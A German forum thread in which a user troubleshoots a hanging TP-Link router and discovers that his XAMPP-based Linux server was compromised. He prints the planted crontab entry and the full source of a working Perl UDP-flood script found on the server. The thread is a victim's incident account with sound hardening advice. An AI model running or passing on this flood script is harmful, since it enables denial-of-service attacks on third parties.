Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

[david_ffm]

Hallo,

ich habe ein 64Mbit/s Anschluss mit Cisco Router. Ich habe mein alten Fritz Box 7170
ersetz mit dem TP-Link wr1043nd, da ersteres schon bei ca. 30-35Mbit/s am Limit war.
Dann habe ich die DD-WRT Firmware auf dem TP-Link gespielt, da ich die Funktionalität
brauche, z.B. VPN oder Port X auf Port Y zu forwarden wo X<>Y.
Jetzt funktioniert alles prima eine ganze Weile, dann aber irgendwann ist auf einmal
kein internet mehr im LAN oder WLAN und der TP-Link GUI antwortet nicht, oder so
langsam, dass es nicht mehr zu bedienen ist. Dann fängt die verzweifelung an, ich
versuche meist aus/ein schalten des Routers zuerst, dann des Modems, dann ein
Reset des Routers, dann ein 30/30/30 Reset von der TP-Link wie auf der DD-WRT
Seite empfohlen... oder das alles in mehrere Kombinationen und Reihenfolgen.
Irgendwann ist dann der TP-Link wieder ansprechbar und ich kann die Einstellungen
wieder darauf spielen und alles ist gut, wieder für eine Weile, manchmal 2 Tage
manchmal 3 Wochen.
Ich betreibe einen Server und Heimautomation, steuerbar über das internet und
bin oft weg von zuhause, so dass ich auf der Erreichbarkeit angewiesen bin. Ich
habe den Unitymedia Anschluss erst ca. 4 Monate und habe einmal ähnliches
beobachtet mit dem Fritz Box, einmal auch mit dem TP-Link ohne DD-WRT,
weshalb ich mir nicht 100% sicher bin, wo hier das Problem liegt.
Ich habe vor kurzem den TP-Link eingestellt sich einmal die Woche zu rebooten,
danach ist es auch einmal passiert (heute morgen). Das hilft anscheinend auch
nicht, also liegt es vermutlich nicht an vollaufen des Speichers im Router o.ä.
Ansonsten bleibt die internet-Verbindung dauerhaft erhalten.

Hat vielleicht jemanden ähnliche Probleme gehabt und kann eine Lösung vorschlagen,
oder zumindest eine Richtung in den man das Problem untersuchen könnte? Mir
fehlt nichts mehr ein ausser noch mehr Hardware anschaffen in der Hoffnung, dass
es sich vielleicht anders verhält, oder zurück zu DSL über Telefonleitung zu gehen...
das hatte ich viele viele Jahre und habe nie solche Probleme beobachtet.

Ich wäre für alle Tipps sehr sehr dankbar! Bin sonst mit dem UM Anschluss begeistert
aber diese Sache treibt mich langsam in den Wahnsinn!!!

Vielen Dank.

[addicted]

Du beschreibst ein relativ schwammiges Bild des Problems.

Wieso der Router im LAN nichtmehr erreichbar ist, kann ja ansich nichts mit der WAN-Verbindung zu tun haben, höchstens durch diese ausgelöst werden. Klär das evtl. mal mit DD-WRT oder TP-Link Support?

Wenn das Problem erledigt ist, und Du immernoch die WAN-Verbindung verlierst, können wir uns damit befassen.

[david_ffm]

Du beschreibst ein relativ schwammiges Bild des Problems.

Hmmm... da muss ich dir recht geben. leider.
Allerdings lässt sich das Problem momentan nicht näher analysieren, und meine Hoffnung war, hier auch
Expertise mit dem TP-Link und DD-WRT zu finden. Da das Problem aber auch (zumindest einmal)
mit dem Fritz Box 7170 aufgetreten ist, denke ich dass es zumindest ein Bezug zum WAN haben könnte.
Es sieht meist so aus als wäre der Router überlastet, daraufhin deuten manchmal die sar zahlen o.ä.
in der Status Zeile. Wenn ich so etwas mache wie "ping -n 1000 192.168.1.1" sehe ich manchmal 95%
der Pakete timeout dann schafft ab und zu eine doch durch. Klar, ich wurde auch sagen, erstmal muss
der Router sich im LAN vernünftig verhalten. Das letzte mal habe ich das aber nur erreicht dadurch,
dass ich den von WAN getrennt habe, was aber auch schon Zufall sein könnte da ich recht lange alles
mögliche ausprobiert habe, bis es dann irgendwann ginge. Wenn ich es im Problemfall schaffe die
Oberfläche der TP-Link zu laden steht manchmal (aber nicht immer) 0.0.0.0 als WAN Adresse, was
aber auch mehrere Grunde haben könnte.
Ich hatte wirklich gehofft, dass es Experten hier gibt die zumindest Hinweise hätten wie man das Problem
genauer untersuchen bzw. eingrenzen könnte - das wäre schon mal ein Anfang.
Trotzdem, vielen Dank für die Antwort.

[addicted]

Sorry, mit dem Router und DD-WRT kenne ich mich nicht aus. Evtl. kann ein Admin den Thread ein Board höher schieben, dort sehen ihn mehr Leute.

Ich halte es für sinnvoll, zuerst die LAN-Problematik anzugehen, weil Du dann während eines Ausfalls des WANs wenigstens auf die Modemwerte zugreifen kannst :)

Als Alternative müsstest Du nachsehen ob Du auch die Verbindung verlierst, wenn Du einen Rechner direkt am Modem angeschlossen hast. Dann solltest Du auch auf die Modemwerte zugreifen können, und das sollte dann eine Fehlerdiagnose ermöglichen.

[david_ffm]

Als Alternative müsstest Du nachsehen ob Du auch die Verbindung verlierst, wenn Du einen Rechner direkt am Modem angeschlossen hast. Dann solltest Du auch auf die Modemwerte zugreifen können, und das sollte dann eine Fehlerdiagnose ermöglichen.

Problem ist, dass ich diese Konfiguration evtl. mehrere Wochen so betreiben musste um das Problem zu beobachten oder aussschliessen.
Da ich aber den Server für Heimautomation und als Datenbankserver benötige geht es nicht so. Ich habe überlegt als Notlösung wenn ich
wirklich nichts besseres finde, den Server mit weitere ethernet Ports auszustatten und als Router konfigurieren - das wurde ich nicht sehr
gerne machen aber dann hätte ich wenigstens Zugriff auf Logfiles und weitere Diagnostik usw. Auf jeden Fall wenn ich im Problemfall
einen Rechner an dem Modem anschliesse und letzteres neu starte (nötig wegen neue mac-Adresse) geht es.
Was mir auch als Unterschied zum unproblematischen DSL-Betrieb auffällt ist, dass es keine Zwangstrennung bei UM gibt.
Als ich einmal mit der Hotline gesprochen habe war der UM Kollege etwas überrascht zu sehen, dass die Verbindung schon
seit Wochen stand. Es wurde mich mal interessieren, wie es die meisten machen - mit/ohne regelmässige Trennung und wenn
mit, wie wird dies umgesetzt? Ein Reboot des Routers scheint nicht zwangsläufig zu einer Trennung der Verbindung zu führen.
Gibt es gute Grunde, regelmässig die Verbindung zu trennen?

[addicted]

Du könntest Dir einen Switch mit VLAN-Unterstützung kaufen, dann kommst Du mit einer NIC im Server aus. Kostet auch nurnoch knapp unter €100,- ;)

Natürlich gibt es keine beknackte Zwangstrennung. Einige Leute wollen das, um kostenlos bei den Massenhostern mehr Daten pro 24 Stunden herunterladen zu können. Da die IP-Adressen per DHCP vergeben werden, gibt es eine neue IP wenn man die MAC des Routers ändert. Da das Modem dann neu gestartet werden muss, ist das den meisten Leuten das zu umständlich und das Gemecker geht hier im Forum los ;)

Es gab mal das Problem mit den Cisco Modems, dass sie von Docsis 3 auf Docsis 2 sprangen, dabei nurnoch einen Downstreamkanal verwendeten, aber die Leitung faktisch tot war. Falls der TP-Link sehr hohe Timeouts für irgendwas am WAN-Port hat, könnte das zu dem beschriebenen Verhalten führen. Ein Neustart des Modems sorgt dann wieder für eine korrekte Synchronisation mit Docsis 3.
Bei den meisten Leuten ist dieses Problem aufgetreten, wenn sie den Upload für eine Weile voll ausgenutzt haben, manchmal auch nur bei Verwendung von vielen parallelen Verbindungen.
Vielleicht kannst Du Dein Problem mit dieser Information nachstellen?

[karl99]

Hallo!

Benutze auch den TP-Link Router und auch mit der dd-wrt Software.
Betreibe hinter dem Router noch 3 andere Rechner die ich per WOL ohne Probleme starten/ansprechen kann.
Du solltest vllt mal angeben welche Version der dd-wrt Software Du benutzt.
Ich hatte mit der Version vom 2010-08-09 auch mal das eine oder andere Problem.
Seit dem nehme ich immer die neuste eko Version. Damit gab es bisher keine Probleme.

[david_ffm]

Du könntest Dir einen Switch mit VLAN-Unterstützung kaufen, dann kommst Du mit einer NIC im Server aus. Kostet auch nurnoch knapp unter €100,-
...
Vielleicht kannst Du Dein Problem mit dieser Information nachstellen?

Besten Dank für die Ideen. VLAN ist für mich eine neue Idee, habe mich da schnell bei Wikipedia schlau gemacht was
das ist aber ich verstehe nicht ganz, wie es mir helfen wurde. Wenn der VLAN Router sich ebenfalls aufhängt stehe ich
genau so blöd da, wenn nicht dann ist das Problem gelöst, aber das wäre auch ohne VLAN so... oder was habe ich da
nicht verstanden? Ausserdem liefert mir meine lieblings Preissuchmaschine nur VLAN Router die momentan nicht
lieferbar sind - hättest du vielleicht eine Empfehlung da?
Ich wäre durchaus bereit EUR100 zu investieren in einer elegante hardware-Lösung.

Ich mache kein P2P o.ä. das höhere Uploads verursacht - ab und zu eine grosse Datei (1-2GB) über http oder VPN in der
Verwandschaft, aber ich habe da kein Zusammenhang zu den Hängern beobachten können. Ich hatte mal Suchmaschinen
die ganz viel vom Server gesaugt haben (jeder Menge Urlaubsfotos), die habe ich aber mit einer robots.txt jetzt
zufrieden gestellt und das Problem tritt trotzdem noch auf. Muss mal schauen, ob ich ein test hinbekomme mit sehr
viele Verbindungen und ob das das Problem nachstellen kann. Ich merke auch seit Jahren Angriffe auf dem http Server
in den Logs - wäre auch evtl. denkbar, dass ähnliches mit dem Router passiert. Es gibt ja Strategien die irgendeine
Tabelle zum überlaufen bringen sollen o.ä.

Ich habe auch gemerkt, dass ich selbst nach einem Restart des Modems dieselbe IP bekomme - vermutlich liegt das
dann daran, dass der MAC sich nicht geändert hat. Finde ich auch gut, dass der IP nicht immer sinnlos gewechselt
wird.

[addicted]

Sorry, da hast Du mich missverstanden - VLAN war nicht ganz ernst gemeint und lediglich als Alternative zu mehreren Netzwerkkarten in Deinem Server gedacht. Es gibt keine mir bekannten speziellen VLAN Router. VLAN-Unterstützung wird in einen Switch eingebaut, einen Router brauchst Du weiterhin (in dem Fall dann Deinen Server, aber da warst Du ja eher abgeneigt).

Ich will Dich nicht auf irgendwelche hoffnungsvollen Wege leiten, deren Umsetzung dann aufgrund mangelnder Erfahrung auch nicht zum Erfolg führen.

Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?

[david_ffm]

Hallo!
...
Seit dem nehme ich immer die neuste eko Version. Damit gab es bisher keine Probleme.

Was ist dann die "eko" Version? In meinem Router steht als String zu der Version:
Firmware: DD-WRT v24-sp2 (03/24/10) std
Komischerweise steht auf dd-wrt.com als neueste Version v24 SP1 (Build10020) -
verstehe ich bicht so ganz. Jedenfalls habe ich diese Version in Januar als neueste
aus der Router-Datenbank gezogen.
Ich bin aber jetzt erstmal zurück zu der alte TP-Link Firmware gegangen weil der Router
mit DD-WRT wollte überhaupt gar keine WAN Adresse mehr per DHCP ziehen, egal was
ich mache. Was ich wirklich brauche ist die möglichkeit Verschiedenen Servern im LAN
von aussen zu erreichen und dafür war die flexiblere DD-WRT Port-Forwarding gut, ich
habe mir aber erstmal eine Lösung mit Apache Virtual Hosts und ein Squid Proxy gebastelt.
Nicht schön, aber es funktioniert - werde mal schauen, ob die TP-Link Firmware sich auf
dauer stabilier verhält als DD-WRT.

[david_ffm]

Sorry, da hast Du mich missverstanden - VLAN war nicht ganz ernst gemeint und lediglich als Alternative zu mehreren Netzwerkkarten in Deinem Server gedacht. Es gibt keine mir bekannten speziellen VLAN Router. VLAN-Unterstützung wird in einen Switch eingebaut, einen Router brauchst Du weiterhin (in dem Fall dann Deinen Server, aber da warst Du ja eher abgeneigt).

Ich verstehe aber nicht, wie mir da ein VLAN switch mehr hilft als ein normales switch. VLAN scheint für
den Fall gedacht dass man mehrere LANS hat und die nicht unbedingt durch physikalischen netzwerk-Segmente
definieren will. Das wäre sehr praktisch in dem Fall aber ich habe und brauche ja nur eine LAN.

Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?

Verstehe ich nicht ganz - welche logfiles sollen sie schicken? Oder ich? Ich denke nicht, dass es da Support
gibt, höchstens kann man so wie hier in dem Forum posten.

[addicted]

Ich verstehe aber nicht, wie mir da ein VLAN switch mehr hilft als ein normales switch.

Vergiss das VLAN. Es ging darum, dass Du in Deinen Server eine zweite NIC einbauen wolltest, und ihn dann als Router verwendest. Wenn Du das nichtmehr vor hast, musst Du auch nicht über VLAN nachdenken.

Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?

Verstehe ich nicht ganz - welche logfiles sollen sie schicken? Oder ich? Ich denke nicht, dass es da Support
gibt, höchstens kann man so wie hier in dem Forum posten.

Tjaaaa ... ;)

[david_ffm]

Vergiss das VLAN. Es ging darum, dass Du in Deinen Server eine zweite NIC einbauen wolltest, und ihn dann als Router verwendest. Wenn Du das nichtmehr vor hast, musst Du auch nicht über VLAN nachdenken.

Ja, das hatte ich auch so verstanden, und das überlege ich immer noch als Option. Eine laufende linux-Kiste
wo man voll darauf zugreifen kann auch mit Konsole hängt sich nicht einfach so auf, oder wenn er das doch
tut, hat man ganz andere Möglichkeiten das Problem zu analysieren. Der Linux Kernel und insbesondereund
TCP-IP-Stack sind sehr ausgereift, getestet und stabil, was man nicht unbedingt für DD-WRT sagen kann.
Aber wie wurde mir da die VLAN Switch helfen?

[addicted]

Oki, also die Details :)


Ein VLAN-fähiger Switch kann einzelnen Hardware-Ports VLAN-Markierungen zuweisen. Im Wesentlichen sortiert er seine Ports in unterschiedliche Netze. Man kann aber auch einen Port in mehrere Netze hängen.

Hier zunächst das Setup:
Für alle Switchports legst Du ein Default-VLAN an, z.B. "1". Jetzt legst Du ein weiteres VLAN an, z.B. "42", und weist diesem einen Port am Switch zu. Das Default-VLAN entfernst Du von diesem Port, und dann schließt Du das Kabelmodem daran an. Dann legst Du den Port an dem Dein Linuxserver hängt zusätzlich in VLAN 42, so dass dieser also in beiden VLANs, "1" und "42", ist. Setze auf dem Port für Pakete mit fehlender VLAN-Markierung noch das Default VLAN "1" als Ziel.
Auf dem Linuxserver konfigurierst Du Dir nun ein virtuelles Interface, z.B. "vlan42", welches als VLAN-Interface mit der VLAN-Markierung "42" auf dem normalen Ethernet Interface (z.B. "eth0") aufsetzt.

Was jetzt passiert:
Jetzt kann der Linuxserver über dieses Interface direkt mit dem Modem reden, ohne eine weitere NIC zu benötigen. Sendet er aber Pakete auf eth0, setzt der Switch diese automatisch auf VLAN 1, welches nicht an den Port zum Kabelmodem gesendet wird, sondern nur an die anderen LAN Ports. Ankommende Pakete mit VLAN "1" sollten an eth0 anliegen, sofern kein zugehöriges VLAN-Interface existiert.
Auf vlan42 kannst Du ganz normal DHCP machen, und bekommst direkt auf dem Server die öffentliche IP-Adresse mit allen Vorteilen (z.B. Proto41 für IPv6) und Nachteilen (Portscans, Bruteforce, etc.).

[karl99]

Hallo!

Die neuste eko gibt es hier: http://www.dd-wrt.com/site/support/othe ... r1043nd%2F

[david_ffm]

Oki, also die Details
...

Besten Dank dass du dir Zeit für die Erklärung genommen hast - das wäre tatsächlich eine interessante Lösung.
Wie ist es aber dann mit den anderen Clients, die ins internet wollen? Die hängen im VLAN1, bekommen per DHCP eine IP vom Server,
vermutlich auch default Gateway und DNS. Aber auf dem Server muss dann bridging oder routing auch konfiguriert sein zwischen vlan42
und eth0, oder? Und wie wurde ich dann WLAN bekommen? Ein Access Point auch im VLAN1 hängen, oder gibt es VLAN switches die auch
WLAN haben?
Jetzt suche ich nach einem preiswerten VLAN Router - der D-Link DES-3624i gibt es gebraucht bei eBay für EUR50, hat auch reichlich ports
nur laut Handbuch könnte der Stromverbrauch schon bei 48W liegen, das ist mehr als der Linux Server selbst und schon viel für den
dauerbetrieb zuhause.

Ich habe heute morgen aber auch weiteres zum ursprunglichen Problem beobachten können. Ich habe den TP-Link wr1043nd wieder auf
ursprungliche Firmware zurückgestellt, dennoch hat er sich in der Nacht aufgehängt, Symptome genau wie unter DD-WRT. Ich habe alles
abgestöpselt bis auf Modem und einem PC, dann ginge alles. Langsam alles wieder reingesteckt und festgestellt, sobald ich mein Server
anschliesse ist der Router nicht mehr ansprechbar! Server abgekoppelt, geht alles wieder. Server ist ein ganz normale linux-Kiste mit
SuSe 11 und eine xampp Installation, apache, mysql usw., auch fhem Heimautomation - keine Ahnung, wie er es schafft den Router
runterzuziehen aber so siehts aus im Moment. Ein rootkit virus?! Sobald ich Zeit habe werde ich den Server genauestens anschauen,
was da in solchen Fällen abgeht.

@Karl: Besten Dank, von da hatte ich auch meine DD-WRT - was ich nicht so ganz kappiere ist wieso in meinem Router v24 sp2 steht
und die neueste V24 sp1 ist?! Naja, egal, ich denke nach dem Experiment von heute, dass das Problem doch nicht bei DD-WRT liegt,
und ich werde auch dazu zurückgehen - die erweiterete Funktionalität ist unwiederstehlich ;-)

[addicted]

Wie ist es aber dann mit den anderen Clients, die ins internet wollen?

Wie Du schon schriebst, musst Du dann NAT und Forwarding auf dem Server aktivieren. Ich ging davon aus, dass Du das wusstest, weil es bei Deiner ursprünglichen Idee mit mehreren NICs im Server ja auch nötig ist.
Du kannst einen WLAN-Accesspoint oder einen Router im Accesspoint-/Bridge-Modus einfach mit an den Switch stecken, der landet dann im VLAN 1 wie die kabelgebundenen Geräte auch. Wenn Du einen Usecase dafür hast, könntest Du auch ein eigenes VLAN für Dein WLAN definieren und dass ebenfalls auf dem Server konfigurieren, dann kannst Du für WLAN-Clients z.b. andere Regeln definieren als für Dein LAN (und insbesondere auch WLAN und LAN voneinander trennen).

Ich würde es an Deiner Stelle nicht zu kompliziert machen. Ich kenne es von mir selbst, dass man sauviel Arbeit in das Setup investiert, es dann aber im alltäglichen Betrieb garnicht benötigt, aber wenn mal was schiefgeht benötigt man wieder viel Zeit für die Fehlersuche, weil alles so komplex ist.

Vielleicht baut Dein Server zuviele parallele Verbindungen auf? Nicht alle Hardwarerouter kommen damit zurecht.

[david_ffm]

Wie ist es aber dann mit den anderen Clients, die ins internet wollen?

Vielleicht baut Dein Server zuviele parallele Verbindungen auf? Nicht alle Hardwarerouter kommen damit zurecht.

Nicht zu fassen - ich habe tatsächlich auf dem Linux Server etwas böses eingefangen!
Im Crontab von nobody steht:
* * * * * /tmp/.dada/.s.s/update >/dev/null 2>&1
(wird also jede Minute ausgeführt)
Im Prozessraum war zu sehen:
nobody 9257 5434 99 16:49 ? 01:53:59 /usr/bin/perl ./x 92.114.4.17 0 0
der annährend 100% CPU verbraucht...
und dann gibt es eine Datei /tmp/.dada/.s.s/x die so aussieht wie unten.
Klar, wenn man die "for (;;)" Schleife anschaut, dass so etwas jeden Router zerhauen kann!
Jetzt muss ich erstmal schauen, wie ich das wegkriege und wie ich mich für eine Neuinfektion
schutzen kann - wenn der Server überhaupt noch zu retten ist. Naja, ganz so raffiniert scheint
es nicht zu sein, ist auf jeden Fall kein stuxnet ;-)


#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Slashing SirVic's server on victim...\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 x) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

[addicted]

Jap, das könnte es gewesen sein ;)
Das Script auf hax.asia. Die gebombte IP scheint in Rumänien vergeben zu sein.
Naja, viel Spaß bei der Neuinstallation.

[piotr]

Brauchst Du wirklich PHP oder geht es auch ohne?

Wenn PHP nicht sicher genug konfiguriert ist und/oder die PHP-Applikation nicht auf dem aktuellen Stand ist, dann ist recht einfach ueber PHP Exploits Dein aus dem Internet erreichbares Linux-System zu uebernehmen.

Teilweise reicht es bereits aus zu wissen welche PHP-Version installiert ist... das bekommt man mit der Default PHP-Konfiguration sehr schnell raus. Auch ohne dass Du es irgendwo in Deiner PHP-Applikation anzeigst.

Viel Spass beim Lesen:
http://www.heise.de/security/artikel/Gr ... 70918.html

[david_ffm]

Jap, das könnte es gewesen sein
Das Script auf hax.asia. Die gebombte IP scheint in Rumänien vergeben zu sein.
Naja, viel Spaß bei der Neuinstallation.

Danke, ja, soviel habe ich auch ergoogelt...allerdings nicht, wer "Sir Vic" ist oder warum sein Server angegriffen werden soll ;-)

Immerhin habe ich kein Indiz dafür, dass sich die Prozesse root-Rechte haben beschaffen können. Sie tarnen sich auch
als httpd, laufen aber alle unter der Kennung "nobody". Ich habe die exploits in /tmp alle gelöscht, crontab deaktiviert, getarnte
httpd Prozesse beendet, avira installiert und gescanned, neu gestartet, auch einige root crontabs eingerichtet die mir stundlich
über diverse Stati berichten.
Ich werde es so eine Weile beobachten. Ein neu-Aufsetzen wäre denkbar, aber ich denke kaum sinnvoll vor ich weiss wie der Mist
auf meinem Server gekommen ist und dieser unterbinden kann.

@piotr: Vielen Dank für die Link. Ich kann leider kaum auf PHP oder Perl verzichten, der grösste Teil der Funktionalität
auf meinem Server verlässt sich auf eins von beiden. Ich werde mich wohl mit dem Thema in Detail jetzt befassen mussen,
es scheint sehr aufwändig zu sein. Ich wurde gerne den genauen Infektionsweg kennen, weiss nicht, ob ich das irgendwie
herausfinden kann.

[addicted]

Mir fällt grad auf: Ist bei es bei SUSE per Default erlaubt, dass nobody eine Crontab haben darf?

[david_ffm]

Mir fällt grad auf: Ist bei es bei SUSE per Default erlaubt, dass nobody eine Crontab haben darf?

anscheinend schon...ich habe mehrere SuSe 10 und 11 installationen und bei mir steht nur gast
in cron.deny, das wurde bedeuten, dass alle andere durfen. Bis jetzt scheint alles rühig zu sein -
habe festgestellt, dass xampp defaultmässig der phpmyadmin Seite für mysql admin offen lässt
ohne passwort! Das finde ich ein unding! Möglicherweise kommt das Zeug von dort auf dem
Rechner, da kann man so ziemlich alles machen.

[oxygen]

xampp ist nur für lokale Installationen geeignet (steht auch überall). Für öffentlich erreichbare Installationen sollte man tunlichst die Distributionspakete verwenden.

[david_ffm]

xampp ist nur für lokale Installationen geeignet (steht auch überall). Für öffentlich erreichbare Installationen sollte man tunlichst die Distributionspakete verwenden.

Stimmt auch wieder... ich bin gewissermassen selber Schuld, hast du Recht.
Ich werde irgendwie die Zeit finden mussen um die standard-Pakete so lange zu bearbeiten,
dass alles funktioniert und trotzdem sicher ist. Der default ist da leider Sicherheit zu erreichen,
indem man alles abschaltet.